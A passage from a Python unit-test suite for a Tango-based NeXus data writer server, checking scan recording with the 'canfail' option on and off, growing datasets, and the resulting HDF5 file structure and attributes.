self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
dp.Canfail = True
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
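            # record steps with empty JSON so the CLIENT datasources fail
            # and the canfail strategy marks them as FAILED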
dp.Record('{}')
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{}')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
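            # failed steps are filled with the float64 max fill value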
for i in range(len(value)):
self.assertEqual(
value[i], numpy.finfo(getattr(numpy, 'float64')).max)
self.assertEqual(len(cnt.attributes), 6)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
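            # the canfail bookkeeping attributes record the failure and its error messages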
at = cnt.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = cnt.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument"
"/detector:NXdetector/counter1 not found. DATASOURCE: CLIENT"
" record exp_c01', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/counter1 not found. DATASOURCE: CLIENT record exp_c01',"
" 'Data without value')")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
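            # failed MCA steps are also filled with the float64 max fill value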
for i in range(len(value[0])):
self.assertEqual(numpy.finfo(getattr(numpy, 'float64')).max,
value[0][i])
for i in range(len(value[0])):
self.assertEqual(numpy.finfo(getattr(numpy, 'float64')).max,
value[1][i])
self.assertEqual(len(mca.attributes), 6)
at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = mca.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument/"
"detector:NXdetector/mca not found. DATASOURCE: CLIENT "
"record p09/mca/exp.02', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/mca not found. DATASOURCE: CLIENT record p09/mca/exp.02', "
"'Data without value')")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
# cnt = dt.open("cnt1")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(numpy.finfo(getattr(numpy, 'float64')).max,
value[i])
self.assertEqual(len(cnt.attributes), 6)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = cnt.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument/"
"detector:NXdetector/counter1 not found. DATASOURCE: CLIENT "
"record exp_c01', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/counter1 not found. DATASOURCE: CLIENT record exp_c01', "
"'Data without value')")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
# self.assertEqual(mca.name,"mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(
numpy.finfo(getattr(numpy, 'float64')).max,
value[0][i])
for i in range(len(value[0])):
self.assertEqual(
numpy.finfo(getattr(numpy, 'float64')).max,
value[1][i])
self.assertEqual(len(mca.attributes), 6)
at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = mca.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument/detector"
":NXdetector/mca not found. DATASOURCE: CLIENT record "
"p09/mca/exp.02', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/mca not found. DATASOURCE: CLIENT record p09/mca/exp.02', "
"'Data without value')")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
    # \brief It tests that recording with canfail disabled raises and drives the server to FAULT
def test_scanRecord_canfail_false(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
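            # disable canfail: missing client data should now make Record raise
            # and put the server in FAULT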
dp.Canfail = False
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.myAssertRaise(Exception, dp.Record, '{}')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.myAssertRaise(Exception, dp.Record, '{}')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.canfail, False)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
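            # the entry and file can still be closed; canfail reverts to True
            # but the device stays in FAULT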
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
# self.assertEqual(cnt.shape, (1,))
self.assertEqual(cnt.dtype, "float64")
# self.assertEqual(cnt.size, 1)
cnt.read()
# value = cnt[:]
# for i in range(len(value)):
# self.assertEqual(self._counter[i], value[i])
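            # only the four static attributes are present;
            # no nexdatas_canfail/_error attributes were written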
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
# self.assertEqual(mca.shape, (2,2048))
self.assertEqual(mca.dtype, "float64")
# self.assertEqual(mca.size, 4096)
mca.read()
# for i in range(len(value[0])):
# self.assertEqual(self._mca1[i], value[0][i])
# for i in range(len(value[0])):
# self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
# cnt = dt.open("cnt1")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
# self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
# self.assertEqual(cnt.size, 2)
# print(cnt.read())
cnt[:]
# for i in range(len(value)):
# self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
# self.assertEqual(mca.name,"mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
# self.assertEqual(mca.shape, (2,2048))
self.assertEqual(mca.dtype, "float64")
# self.assertEqual(mca.size, 4096)
mca.read()
# for i in range(len(value[0])):
# self.assertEqual(self._mca1[i], value[0][i])
# for i in range(len(value[0])):
# self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
    # \brief It tests recording of a simple h5 file with datasets growing by two points per record
def test_scanRecordGrow2(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
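            # each Record call carries two counter points and two MCA spectra,
            # so the datasets grow by two rows per record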
cntg = [self._counter[0], self._counter[1]]
mcag = [self._mca1, self._mca2]
rec = {"data": {"exp_c01": cntg, "p09/mca/exp.02": mcag}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
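            # the second record sends the two points in reversed order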
cntg = [self._counter[1], self._counter[0]]
mcag = [self._mca2, self._mca1]
rec = {"data": {"exp_c01": cntg, "p09/mca/exp.02": mcag}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") # bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
